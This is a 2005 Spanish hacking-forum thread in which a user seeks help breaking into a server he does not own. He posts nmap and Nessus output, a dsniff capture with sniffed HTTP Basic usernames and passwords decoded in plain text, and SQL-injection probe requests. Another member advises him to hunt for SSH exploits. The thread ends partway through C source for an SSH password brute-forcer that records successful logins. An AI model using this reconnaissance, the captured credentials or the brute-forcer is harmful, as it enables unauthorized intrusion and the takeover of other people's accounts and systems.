elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
18 Noviembre 2008, 23:26  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Linux/Unix (Moderador: berz3k)
| | | |-+  Un hecho real - penetración
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Imprimir
Autor Tema: Un hecho real - penetración  (Leído 6140 veces)
zeta007

Desconectado Desconectado

Mensajes: 116



Ver Perfil
Un hecho real - penetración
« en: 13 Febrero 2005, 03:11 »

Quisiera saber, de parte del foro, si puedo postear hasta donde yo he llegado para intentar penetrar en un sistema, para hacerlo público y que me ayuden finalmente a entrar o por lo menos a seguir ascendiendo mi experiencia, porque nunca he podido entrar en un sistema, y eso me altera... y lo único que he podido hacer es escanear... escanear... escanear... y la verdad es que uno ya se pudre...
Bueno, la cosa es que quisiera postearlo, si me dejan, para ver qué puedo hacer... y que quede al aire para dar como ejemplo de una penetración (el ip víctima no lo pondré nunca)...

Please, hace 2 semanas enteras que vengo leyendo, estudiando, todo a full... pero no puedo seguir más... y yo he probado de todo: finger, ping, telnet, ftp, tftp, nmap, ettercap, ethereal, nslookup, scanssh, dsniff, sniffiti, nessus, deadftp, etc Pero siempre mi resultado es más información del sistema, pero nunca cómo podré penetrarlo...

Bueno, pues espero una respuesta...
Al cabo que no me respondan en un día, lo tomaré que lo puedo escribir...
Desde ya muchas gracias ;)
En línea
neuromante

Desconectado Desconectado

Mensajes: 63


Ver Perfil
Re: Un hecho real - penetración
« Respuesta #1 en: 13 Febrero 2005, 07:48 »

disculpame yo no soy moderador del foro asi que no puedo saber si lo que vas a hacer se puede o no, escribo por otra cosa.
Vamos amigo, si en 2 semanas te piensas que puedes ser hacker estas muy equivocado ...
La informacion es valiosa pero para penetrar en el sistema o por lo menos para hacerte de una cuenta de usuario comun para luego elevar tus privilegios nesesitas un exploit y para esto nesesitas saber programar.
Es indispensable poder programar, y eso te lleva algo mas que 2 semanas ...
Trata de aprender todo lo que puedas sobre como funciona tu propio sistema y en todo caso hacete una red local con 2 o 3 computadoras para poder probar distintas tecnicas y ver lo que pasa a ambos lados, despues de eso entrar a una computadora ajena se te simplifica y mucho.
no esperes resultados en 2 semanas porque es probable que no los vayas a tener y si llegas a penetrar por casualida en algun sistema no vas a tener ni la menos idea de lo que hacer despues, por lo tanto no vas a sacar ningun provecho de la penetracion y el hacking te va a parecer frustrante.
En línea
zeta007

Desconectado Desconectado

Mensajes: 116



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #2 en: 13 Febrero 2005, 10:21 »

Bueno, perdón si me expresé mal, pero en realidad llamaba a 2 semanas de puro estudio... (hace 67 hs que no duermo) y es más, estuve mucho tiempo con linux, más de 1 año, y en mis épocas de W$ me hacía programas yo mismo con visual... después agarré C y C++, y con eso me bastó para mucho más, y luego también con java, para entender las páginas web.
La cosa en realidad es que vengo más de 6 años (posta) recorriendo el mundo del baudio y del chip :D, o sea, redes, seguridad y todo con el tema de hacking, he estado mucho tiempo con esto.

Por otra parte le preguntaba a los del foro porque yo quisiera poner algún ejemplo de penetración, que creo que eso es lo que todos quieren, y para que sirva como ejemplo, y que los incientive a seguir explorando y descubriendo nuevas puertas al mundo de Internet.

Claro está que a mi me falta muy poco para penetrar, o por lo menos eso es lo que pienso, porque tengo users, passwords, direcciones para agarra (GET), lugares privilegiados, de todo... y para los que ya tienen cancha, seguramente sabrán que me falta una boludes hacer; que me falta un empujoncito :) (como por ejemplo, tengo los users y pass de muchas ip para entrar por el puerto http, que ENCIMA los escaneé y me dice, por medio del nessus, que está en peligro, o sea, que tiene un hollo.

Por otra parte ya se que tengo que usar exploits, pero como veras, ni eso entiendo muy bien, pero se lo que son y para qué están, pero la cosa es que no se usarlos muy bien. Se que se pueden encontrar en .c .ssh y muchos formatos más... pero se me complica ahí... y eso es lo que quiero que me expliquen...

Yo creo que si me explicaran eso, y con ésto poder entrar a 1 pc, solamente 1, sería uno de los cuantas personas más felices del mundo, ya que nunca entré en 1 pc, como dije anteriormente, y ese es mi comienzo.

Por eso, solo lo que quiero es la oportunidad de dar mis primeros pasos, de infiltrarme en 1 pc, de hacer mis sueños realidad, de comenzar una nueva vida... (exagerando)...

Pues bueno, eso es todo lo que quiero decir, pues gracias y porfa respondan a ver qué opinan. ;)
En línea
fandango
Another
Colaborador

Desconectado Desconectado

Mensajes: 1.921


Powered By Slackware!


Ver Perfil
Re: Un hecho real - penetración
« Respuesta #3 en: 13 Febrero 2005, 10:28 »

Pues mira que lo tienes todo servido bro, sabes programar, entiendes de exploits, tienes user y sus password. No entiendo como no puedes entrar al sistema. ???
En línea

zeta007

Desconectado Desconectado

Mensajes: 116



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #4 en: 13 Febrero 2005, 10:38 »

A eso miercoles me refiero, necesito un empujoncito!!!!!!!!!!!!!!!!!!!!!
Aunque por otra parte, lo quería postear, porque la mayoría de la gente pregunta por: cómo puedo entrar en una pc, pues bueno, démosle un ejemplo y listo... (lo hago en modo de explicación a mi post, y luego, ustedes, los ¨genios¨ me resuelven lo último que me falta)
En línea
zeta007

Desconectado Desconectado

Mensajes: 116



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #5 en: 14 Febrero 2005, 04:33 »

Pues la verdad es que me he cansado de preguntar y esperar, a si que mando mi duda principal y si los moderadores no están de acuerdo con mi pregunta, pues que saquen mi post, claro está que a mi no me molestará de todas formas...

Pues he aquí lo que pude sacar con el dsniff, nmap y el nessus:

Starting nmap 3.55 ( xxxx ) at 2005-02-05 02:28 ART
Interesting ports on xxxxxxxxxxxxx (xxxxx):
(The 1641 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp
22/tcp   open     ssh
25/tcp   open     smtp
53/tcp   open     domain
80/tcp   open     http
110/tcp  open     pop3
135/tcp  filtered msrpc
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
143/tcp  open     imap
145/tcp  filtered uaac
179/tcp  open     bgp
443/tcp  open     https
993/tcp  open     imaps
995/tcp  open     pop3s
2601/tcp open     zebra
2605/tcp open     bgpd
3306/tcp open     mysql
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux 2.4.0 - 2.5.20
Uptime 21.655 days (since Fri Jan 14 10:46:44 2005)

dsniff: listening on eth1
-----------------
02/11/05 07:16:55 tcp ***.***.***.***.57434 -> *******.******.*****.7117 (http)
GET / HTTP/1.1
Host: *****************************
Authorization: Basic cTFraTk6ZDA5a2xt [q1ki9:d09klm]

-----------------
02/11/05 07:17:02 tcp ***.***.***.***.57478 -> **************************.80 (http)
GET / HTTP/1.1
Host: *******************************
Authorization: Basic cTFraTk6ZDA5a2xt [q1ki9:d09klm]

-----------------
02/11/05 07:17:48 tcp ***.***.***.***.57864 -> ******************************.7117 (http)
GET /products_archivos/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: **********************

GET /_derived/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ****************************

GET /_borders/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ****************************

GET /_derived/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: *****************************

-----------------
02/11/05 07:18:00 tcp ***.***.***.***.57955 -> *******************************.80 (http)
GET /products_archivos/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ******************************

-----------------
02/11/05 07:18:00 tcp ***.***.***.***.57958 -> *******************************.80 (http)
GET /_derived/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: *******************************

-----------------
02/11/05 07:18:05 tcp ***.***.***.***.58009 -> ******************************.80 (http)
GET /products_archivos/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: *********************************

-----------------
02/11/05 07:18:06 tcp ***.***.***.***.58018 -> ******************************.80 (http)
GET /mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ***************************

-----------------
02/11/05 07:18:09 tcp ***.***.***.***.8024 -> ***********************.80 (http)
GET /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ***************************

-----------------
02/11/05 07:19:37 tcp ***.***.***.***.58764 -> ***************************.7117 (http)
GET / HTTP/1.1
Host: ***************************
Authorization: Basic c3VwZXJtYW46MjEyNDEwMzY= [superman:21241036]

GET / HTTP/1.1
Host: ****************************
Authorization: Basic c3VwZXI6NTc3NzM2NA== [super:5777364]

-----------------
02/11/05 07:20:43 tcp ***.***.***.***.57963 -> **************************.80 (http)
GET /_borders/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ********************************

-----------------
02/11/05 07:20:45 tcp ***.***.***.***.57969 -> *******************************.80 (http)
GET /_derived/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: *********************************

-----------------
02/11/05 07:20:49 tcp ***.***.***.***.58011 -> *****************************.80 (http)
GET /cgi-bin/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ******************************

-----------------
02/11/05 07:20:53 tcp ***.***.***.***.58058 -> *****************************.80 (http)
GET /horde/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
Host: ***************************

-----------------
02/11/05 07:24:41 tcp ***.***.***.***.60981 -> *************************.7117 (http)
GET /piranha/secure/ HTTP/1.1
Host: ***************************
Authorization: Basic cGlyYW5oYTpx [piranha:q]

GET /piranha/secure/ HTTP/1.1
Host: ******************************
Authorization: Basic cGlyYW5oYTpwaXJhbmhh [piranha:piranha]

-----------------
02/11/05 07:25:36 tcp ***.***.***.***.33238 -> *****************************.7117 (http)
GET / HTTP/1.1
Host: ****************************
Authorization: Basic c3VwZXJ2aXNvcjo= [supervisor:]

-----------------
02/11/05 07:27:17 tcp ***.***.***.***.60998 -> *****************************.80 (http)
GET /piranha/secure/ HTTP/1.1
Host: *********************************
Authorization: Basic cGlyYW5oYTpx [piranha:q]

-----------------
02/11/05 07:27:19 tcp ***.***.***.***.32773 -> ******************************.80 (http)
GET /piranha/secure/ HTTP/1.1
Host: *********************************
Authorization: Basic cGlyYW5oYTpwaXJhbmhh [piranha:piranha]



Vulnerability found on port http (80/tcp)

 The remote server is running at least one instance of IMP whose version
 number is between 2.0 and 3.2.3 inclusive. Such versions are vulnerable
 to a cross-scripting attack whereby an attacker may be able to cause a
 victim to unknowingly run arbitrary Javascript code simply by reading a
 MIME message with a specially crafted Content-Type header.
 
 For information about the vulnerability, including exploits, see :
 
 - http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-2.txt
 - http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
 
 Note : Nessus has determined the vulnerability exists on the target
 simply by looking at the version number of IMP installed there
 it has
 not attempted to actually exploit the vulnerability.
 
 Solution : Upgrade to IMP version 3.2.4 or later.
 Risk factor : High
 CVE : CAN-2004-0584
 BID : 10501
 Other references : GLSA:GLSA-200406-11
 
 Nessus ID : 12263


Vulnerability found on port http (80/tcp)

 The remote server is running at least one instance of IMP whose version
 number is 3.2.4 or lower. Such versions are vulnerable to a
 cross-scripting attack whereby an attacker may be able to inject
 arbitrary content, including script, in a specially crafted MIME
 message. To have an effect, the victim must be using Internet Explorer
 to access IMP and be using the inline MIME viewer for HTML messages.
 
 This vulnerability is a variation on the one reported here :
 
 - http://www.greymagic.com/security/advisories/gm005-mc/
 
 Note : Nessus has determined the vulnerability exists on the target
 simply by looking at the version number of IMP installed there, it has
 not attempted to actually exploit the vulnerability.
 
 Solution : Upgrade to IMP version 3.2.5 or later.
 Risk factor : High
 BID : 10845
 Other references : OSVDB:8293
 
 Nessus ID : 13857

Vulnerability found on port https (443/tcp)

 The remote server is running at least one instance of IMP whose version
 number is between 2.0 and 3.2.3 inclusive. Such versions are vulnerable
 to a cross-scripting attack whereby an attacker may be able to cause a
 victim to unknowingly run arbitrary Javascript code simply by reading a
 MIME message with a specially crafted Content-Type header.
 
 For information about the vulnerability, including exploits, see :
 
 - http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-2.txt
 - http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
 
 Note : Nessus has determined the vulnerability exists on the target
 simply by looking at the version number of IMP installed there
 it has
 not attempted to actually exploit the vulnerability.
 
 Solution : Upgrade to IMP version 3.2.4 or later.
 Risk factor : High
 CVE : CAN-2004-0584
 BID : 10501
 Other references : GLSA:GLSA-200406-11
 
 Nessus ID : 12263


Vulnerability found on port https (443/tcp)


 
 The remote server is running at least one instance of IMP whose version
 number is between 3.0 and 3.2.1 inclusive. Such versions are vulnerable
 to several cross-scripting attacks whereby an attacker can cause a
 victim to unknowingly run arbitrary Javascript code simply by reading an
 HTML message from the attacker.
 
 Announcements of the vulnerabilities can be found at :
 
 - http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2
 - http://marc.theaimsgroup.com/?l=imp&m=105981180431599&w=2
 - http://marc.theaimsgroup.com/?l=imp&m=105990362513789&w=2
 
 Note : Nessus has determined the vulnerability exists on the target
 simply by looking at the version number of IMP installed there. If the
 installation has already been patched, consider this a false positive.
 
 Solution : Upgrade to IMP version 3.2.2 or later or apply patches found
 in the announcements to imp/lib/MIME/Viewer/html.php.
 
 Risk factor : High
 
 Nessus ID : 11815


Vulnerability found on port https (443/tcp)

 The remote server is running at least one instance of IMP whose version
 number is 3.2.4 or lower. Such versions are vulnerable to a
 cross-scripting attack whereby an attacker may be able to inject
 arbitrary content, including script, in a specially crafted MIME
 message. To have an effect, the victim must be using Internet Explorer
 to access IMP and be using the inline MIME viewer for HTML messages.
 
 This vulnerability is a variation on the one reported here :
 
 - http://www.greymagic.com/security/advisories/gm005-mc/
 
 Note : Nessus has determined the vulnerability exists on the target
 simply by looking at the version number of IMP installed there, it has
 not attempted to actually exploit the vulnerability.
 
 Solution : Upgrade to IMP version 3.2.5 or later.
 Risk factor : High
 BID : 10845
 Other references : OSVDB:8293
 
 Nessus ID : 13857

Information found on port https (443/tcp)



 Here is the SSLv2 server certificate:
 Certificate:
 Data:
 Version: 3 (0x2)
 Serial Number: 0 (0x0)
 Signature Algorithm: md5WithRSAEncryption
 Issuer: C=--, ST=SomeState, L=SomeCity, O=SomeOrganization, OU=SomeOrganizationalUnit, CN=localhost.localdomain/emailAddress=root@localhost.localdomain
 Validity
 Not Before: Jun 16 07:25:20 2004 GMT
 Not After : Jun 16 07:25:20 2005 GMT
 Subject: C=--, ST=SomeState, L=SomeCity, O=SomeOrganization, OU=SomeOrganizationalUnit, CN=localhost.localdomain/emailAddress=root@localhost.localdomain
 Subject Public Key Info:
 Public Key Algorithm: rsaEncryption
 RSA Public Key: (1024 bit)
 Modulus (1024 bit):
 00:bd:ed:9b:0d:7c:ad:ca:e1:ee:20:9c:6c:0b:20:
 8b:17:dc:59:15:2e:ad:2b:0e:94:37:20:c0:c2:79:
 52:90:4f:13:fc:03:1a:df:f4:4f:42:be:9f:16:a9:
 0b:c6:82:72:35:00:8e:75:a2:dc:1d:f5:67:95:b5:
 0e:97:a3:c8:79:e8:5f:72:30:c0:25:aa:9f:52:9e:
 ed:1d:fd:3f:46:24:25:c3:a9:3d:f7:c3:36:3f:7c:
 c2:af:c5:4e:c0:8a:2c:9f:b8:bc:cd:80:12:86:97:
 6d:4f:80:40:c5:c4:04:3c:67:92:c5:05:7d:de:5c:
 97:5a:70:f2:1a:ee:49:64:19
 Exponent: 65537 (0x10001)
 X509v3 extensions:
 X509v3 Subject Key Identifier:
 08:88:55:9E:B9:56:DD:93:18:ED:23:09:D4:F2:A9:97:93:ED:4D:48
 X509v3 Authority Key Identifier:
 keyid:08:88:55:9E:B9:56:DD:93:18:ED:23:09:D4:F2:A9:97:93:ED:4D:48
 DirName:/C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain
 serial:00
 
 X509v3 Basic Constraints:
 CA:TRUE
 Signature Algorithm: md5WithRSAEncryption
 67:75:ad:f0:f3:f2:86:cf:73:ec:f2:34:fb:e8:11:02:57:f6:
 28:90:49:a5:bb:12:7c:ad:51:d5:0a:22:bd:e6:3c:4e:2b:d3:
 03:e8:ff:30:97:eb:17:cd:86:db:47:e0:f0:18:0f:36:e0:48:
 7c:ee:73:c3:26:85:fe:6c:ec:66:96:27:82:11:a3:7c:3d:1c:
 83:2b:1b:f1:8c:4d:c6:81:24:e0:94:2a:7e:1a:b2:9f:96:80:
 dc:52:58:8a:ba:1c:2d:97:20:cc:46:92:d5:dd:79:b4:ea:7a:
 9e:3d:6a:c0:3e:16:cf:96:eb:02:6b:37:d2:13:38:62:6e:5a:
 da:95
 Here is the list of available SSLv2 ciphers:
 RC4-MD5
 EXP-RC4-MD5
 RC2-CBC-MD5
 EXP-RC2-CBC-MD5
 DES-CBC-MD5
 DES-CBC3-MD5
 RC4-64-MD5
 The SSLv2 server offers 5 strong ciphers, but also
 0 medium strength and 2 weak "export class" ciphers.
 The weak/medium ciphers may be chosen by an export-grade
 or badly configured client software. They only offer a
 limited protection against a brute force attack

Warning found on port unknown (7117/tcp)



 
 Your webserver supports the TRACE and/or TRACK methods. TRACE and TRACK
 are HTTP methods which are used to debug web server connections.
 
 It has been shown that servers supporting this method are subject
 to cross-site-scripting attacks, dubbed XST for
 "Cross-Site-Tracing", when used in conjunction with
 various weaknesses in browsers.
 
 An attacker may use this flaw to trick your
 legitimate web users to give him their
 credentials.
 
 Solution: Disable these methods.
 
 
 If you are using Apache, add the following lines for each virtual
 host in your configuration file :
 
 RewriteEngine on
 RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
 RewriteRule .* - [F]
 
 If you are using Microsoft IIS, use the URLScan tool to deny HTTP TRACE
 requests or to permit only the methods needed to meet site requirements
 and policy.
 
 If you are using Sun ONE Web Server releases 6.0 SP2 and later, add the
 following to the default object section in obj.conf:
 <Client method="TRACE">
 AuthTrans fn="set-variable"
 remove-headers="transfer-encoding"
 set-headers="content-length: -1"
 error="501"
 </Client>
 
 If you are using Sun ONE Web Server releases 6.0 SP2 or below, compile
 the NSAPI plugin located at:
 http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F50603
 
 
 See http://www.whitehatsec.com/press_releases/WH-PR-20030120.pdf
 http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0035.html
 http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F50603
 http://www.kb.cert.org/vuls/id/867593
 
 Risk factor : Medium
 BID : 9506, 9561, 11604
 
 Nessus ID : 11213


Vulnerability found on port ssh (22/tcp)

 You are running a version of OpenSSH which is older than 3.7.1
 
 Versions older than 3.7.1 are vulnerable to a flaw in the buffer management
 functions which might allow an attacker to execute arbitrary commands on this
 host.
 
 An exploit for this issue is rumored to exist.
 
 
 Note that several distribution patched this hole without changing
 the version number of OpenSSH. Since Nessus solely relied on the
 banner of the remote SSH server to perform this check, this might
 be a false positive.
 
 If you are running a RedHat host, make sure that the command :
 rpm -q openssh-server
 
 Returns :
 openssh-server-3.1p1-13 (RedHat 7.x)
 openssh-server-3.4p1-7 (RedHat 8.0)
 openssh-server-3.5p1-11 (RedHat 9)
 
 Solution : Upgrade to OpenSSH 3.7.1
 See also : http://marc.theaimsgroup.com/?l=openbsd-misc&m=106375452423794&w=2
 http://marc.theaimsgroup.com/?l=openbsd-misc&m=106375456923804&w=2
 Risk factor : High
 CVE : CAN-2003-0682, CAN-2003-0693, CAN-2003-0695
 BID : 8628
 Other references : RHSA:RHSA-2003:279-02, SuSE:SUSE-SA:2003:039
 
 Nessus ID : 11837

Information found on port imaps (993/tcp)

 Here is the SSLv2 server certificate:
 Certificate:
 Data:
 Version: 3 (0x2)
 Serial Number: 0 (0x0)
 Signature Algorithm: md5WithRSAEncryption
 Issuer: C=US, ST=NY, L=New York, O=Courier Mail Server, OU=Automatically-generated IMAP SSL key, CN=localhost/emailAddress=postmaster@example.com
 Validity
 Not Before: Jun 16 21:38:41 2004 GMT
 Not After : Jun 16 21:38:41 2005 GMT
 Subject: C=US, ST=NY, L=New York, O=Courier Mail Server, OU=Automatically-generated IMAP SSL key, CN=localhost/emailAddress=postmaster@example.com
 Subject Public Key Info:
 Public Key Algorithm: rsaEncryption
 RSA Public Key: (1024 bit)
 Modulus (1024 bit):
 00:b7:45:03:4a:5e:87:96:0c:59:d7:29:57:ce:14:
 08:49:21:40:ad:c0:eb:91:ee:05:4e:2f:28:5c:d9:
 23:8c:ba:17:4c:ac:5f:8d:3e:5e:04:ea:e9:06:71:
 34:c4:63:0f:94:1a:7e:b0:76:71:cb:19:4b:79:2b:
 cb:ff:be:ec:4a:e6:64:d1:bc:00:ee:0e:af:4e:f3:
 a1:21:39:95:eb:fd:f6:4f:ff:fe:2a:5b:d8:98:43:
 ff:0d:43:36:11:c0:87:1c:6b:a3:96:a7:cc:c3:8d:
 4c:ea:96:5d:a3:a9:27:cc:59:eb:c3:a6:ba:fd:59:
 df:6a:6f:13:3b:2a:5b:0e:0b
 Exponent: 65537 (0x10001)
 X509v3 extensions:
 Netscape Cert Type:
 SSL Server
 Signature Algorithm: md5WithRSAEncryption
 0e:02:b0:fa:ec:8e:0b:18:30:20:9a:68:88:72:ca:bd:79:49:
 88:e0:d7:9b:5a:30:c0:61:09:0f:6d:ea:6e:58:0a:24:42:db:
 d5:4d:90:c1:bd:2e:18:c7:7e:92:96:d6:d1:6f:69:99:9d:12:
 3c:f7:53:09:32:8a:b2:46:fc:b5:c9:bd:f4:cc:7f:70:fc:2f:
 b5:f4:2b:67:33:4a:01:2e:cc:4e:52:17:3a:81:ff:18:0c:52:
 ef:0b:0a:ce:14:34:b3:28:a4:af:72:cf:e8:8d:87:e5:6c:48:
 4a:84:e5:4b:65:c7:8a:14:e0:96:eb:76:59:e0:06:e8:05:5e:
 ce:b6
 Here is the list of available SSLv2 ciphers:
 RC4-MD5
 EXP-RC4-MD5
 RC2-CBC-MD5
 EXP-RC2-CBC-MD5
 DES-CBC-MD5
 DES-CBC3-MD5
 RC4-64-MD5
 The SSLv2 server offers 5 strong ciphers, but also
 0 medium strength and 2 weak "export class" ciphers.
 The weak/medium ciphers may be chosen by an export-grade
 or badly configured client software. They only offer a
 limited protection against a brute force attack
 
 Solution: disable those ciphers and upgrade your client
 software if necessary.
 See http://support.microsoft.com/default.aspx?scid=kb
 en-us
 216482
 or http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslciphersuite
 This SSLv2 server also accepts SSLv3 connections.
 This SSLv2 server also accepts TLSv1 connections.
 
 
 Nessus ID : 10863


Information found on port pop3s (995/tcp)



 Here is the SSLv2 server certificate:
 Certificate:
 Data:
 Version: 3 (0x2)
 Serial Number: 0 (0x0)
 Signature Algorithm: md5WithRSAEncryption
 Issuer: C=US, ST=NY, L=New York, O=Courier Mail Server, OU=Automatically-generated POP3 SSL key, CN=localhost/emailAddress=postmaster@example.com
 Validity
 Not Before: Jun 16 21:38:51 2004 GMT
 Not After : Jun 16 21:38:51 2005 GMT
 Subject: C=US, ST=NY, L=New York, O=Courier Mail Server, OU=Automatically-generated POP3 SSL key, CN=localhost/emailAddress=postmaster@example.com
 Subject Public Key Info:
 Public Key Algorithm: rsaEncryption
 RSA Public Key: (1024 bit)
 Modulus (1024 bit):
 00:b9:96:34:f9:37:d4:24:16:f4:35:4e:5e:e7:97:
 fa:fc:4d:4e:b1:11:1b:67:36:90:eb:70:2d:41:b5:
 b8:2f:0c:ed:2c:f4:75:99:df:69:d2:36:bb:d3:a2:
 8a:43:f9:eb:b0:14:5d:db:ce:7a:1a:5a:6f:d4:b9:
 1f:3c:59:37:73:7a:b7:45:a8:ab:2d:76:e8:48:cb:
 1d:28:52:09:4c:30:d6:82:95:cf:74:0b:46:15:c4:
 e6:6d:f7:e2:f7:7f:d6:81:2f:ef:ce:b4:fe:35:90:
 40:5a:11:69:85:51:9f:07:60:8c:aa:17:0c:01:cd:
 5c:e3:06:e4:db:f1:43:ea:af
 Exponent: 65537 (0x10001)
 X509v3 extensions:
 Netscape Cert Type:
 SSL Server
 Signature Algorithm: md5WithRSAEncryption
 af:85:94:f8:19:46:e5:cc:46:4f:0b:ac:27:fc:96:49:ab:c7:
 7a:da:46:29:bd:5d:d1:d6:db:8e:b7:7e:6b:be:c4:7d:7b:55:
 13:ef:b9:1a:4f:38:dd:d4:45:e9:7e:e9:4f:ea:6e:ff:4c:41:
 67:74:9b:d2:04:ad:c2:e6:e0:f0:58:83:f6:ef:e5:f6:89:d4:
 ad:89:0d:85:f7:e8:01:1b:d0:61:61:64:63:2c:a2:b1:4e:3e:
 c9:02:20:3f:56:9d:9d:db:a6:0b:a0:a4:12:e6:8d:12:af:12:
 c3:e7:42:cc:5e:b5:1f:e4:ad:1f:74:70:81:70:d3:d5:22:76:
 65:c4
 Here is the list of available SSLv2 ciphers:
 RC4-MD5
 EXP-RC4-MD5
 RC2-CBC-MD5
 EXP-RC2-CBC-MD5
 DES-CBC-MD5
 DES-CBC3-MD5
 RC4-64-MD5
 The SSLv2 server offers 5 strong ciphers, but also
 0 medium strength and 2 weak "export class" ciphers.
 The weak/medium ciphers may be chosen by an export-grade
 or badly configured client software. They only offer a
 limited protection against a brute force attack
 
 Solution: disable those ciphers and upgrade your client
 software if necessary.
 See http://support.microsoft.com/default.aspx?scid=kb
 en-us
 216482
 or http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslciphersuite
 This SSLv2 server also accepts SSLv3 connections.
 This SSLv2 server also accepts TLSv1 connections.
 
 
 Nessus ID : 10863


Pues... esa fue una de la info más destacada para atacar que saqué... la cosa es que de acá use varios programas (ningún exploit) para poder penetrar, pero no pude... y con el comando ftp me he fijado que para la entrada está encriptada, según lo que se, ya que cuando trato de entrar me dice:

Connected to ***.***.***.***.
220 ProFTPD 1.2.9 Server (ProFtp Server) [pc300.jnfnet.com.ar]
500 AUTH not understood
500 AUTH not understood
KERBEROS_V4 rejected as an authentication type     // según lo que se KERBEROS significa que el pass está encriptada tonces no puedo entrar.
Name (***.***.***.***:zeta):

Por otro lado, y según el nessus, el puerto 22=ssh está muy bien abierta, y que con un exploit puedo penetrar, pero la verdad es que no se usar bien el tema de exploits y mucho menos se cúal es...

Pues bueno... espero un poco de ayuda de mano de los expertos!!!

Gracias por todo de antemano!!!
En línea
fandango
Another
Colaborador

Desconectado Desconectado

Mensajes: 1.921


Powered By Slackware!


Ver Perfil
Re: Un hecho real - penetración
« Respuesta #6 en: 14 Febrero 2005, 12:52 »

Busca info acerca de vulnerabilidades para el ssh, tienes muchas páginas, las que mas me gustan: www.securityfocus.org, www.k-otik.com

El sever tiene muchos puertos abiertos, busca bugs para los servicios que esta birndando.

Luego si encuntras un exploit y no sabes como usarlo postealo aquí que se te ayudara.

Saludos.
En línea

zeta007

Desconectado Desconectado

Mensajes: 116



Ver Perfil
Re: Un hecho real - penetración
« Respuesta #7 en: 14 Febrero 2005, 14:37 »

Primero, antes que todo, quería agradecerles a todos por lo que me estan ayudando :D
y después he visto un crackeador de pass para el puerto ssh:

 #include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/time.h>
#include <signal.h>
#include <errno.h>
#include <libssh/libssh.h>
#include <libssh/sftp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

int flag;
int where;
int shell(SSH_SESSION *session){
struct timeval tv;
int err;
char cmd[]="uname -r -s\n";
char rd[2048];
BUFFER *readbuf=buffer_new();
time_t start,acum;


CHANNEL *channel;
channel = open_session_channel(session,1000,1000);
if(isatty(0))
err=channel_request_pty(channel);
// printf("channel request pty > %d\n",err);
err= channel_request_shell(channel);
// printf("channel request shell > %d\n",err);
start=time(0);
while (channel->open!=0)
{
usleep(500000);
err=channel_poll(channel,0);
if(err>0)
{
err=channel_read(channel,readbuf,0,0);
}
else
{
if(start+5<time(0))
{
//printf("5 secs passed\n");
return 1;
}
}
}
return 0;
}



void checkauth(char *user,char *password,char *host)
{
char warn[125]="";
SSH_SESSION *session;
SSH_OPTIONS *options;
int argc=1;
char *argv[]={"none"};
FILE *fp;

if(where%20==0)
{
fp=fopen("log.bigsshf","a");
fprintf(fp,"tring ssh %s@%s %s\n",user,host,password);
fclose(fp);
}
where++;
alarm(10);
options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
session=ssh_connect(options);
if(!session) return ;

if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
{
ssh_disconnect(session);
return;
}

if(shell(session))
{
if(flag) strcpy(warn,"DUP ");
fp=fopen("vuln.txt","a+");
fprintf(fp,"%s%s:%s:%s\n",warn,user,password,host);
printf("%sOk.TRY This : %s:%s:%s\n",warn,user,password,host);
flag=1;
}
else
printf("nologin -> %s:%s:%s\n",user,password,host);
}
int main(int argc, char **argv)
{
FILE *fp;
char *c;
char buff[1024];
int numforks;
int maxf;


if(argc!=2)
{
printf("./bigssh <sship.txt>\n");
printf("by Zorg\n");
exit(0);
}
unlink("log.bigsshf");
fp=fopen("sship.log","r");
if(fp==NULL) exit(printf("nu pot deschide sship.txt\n"));

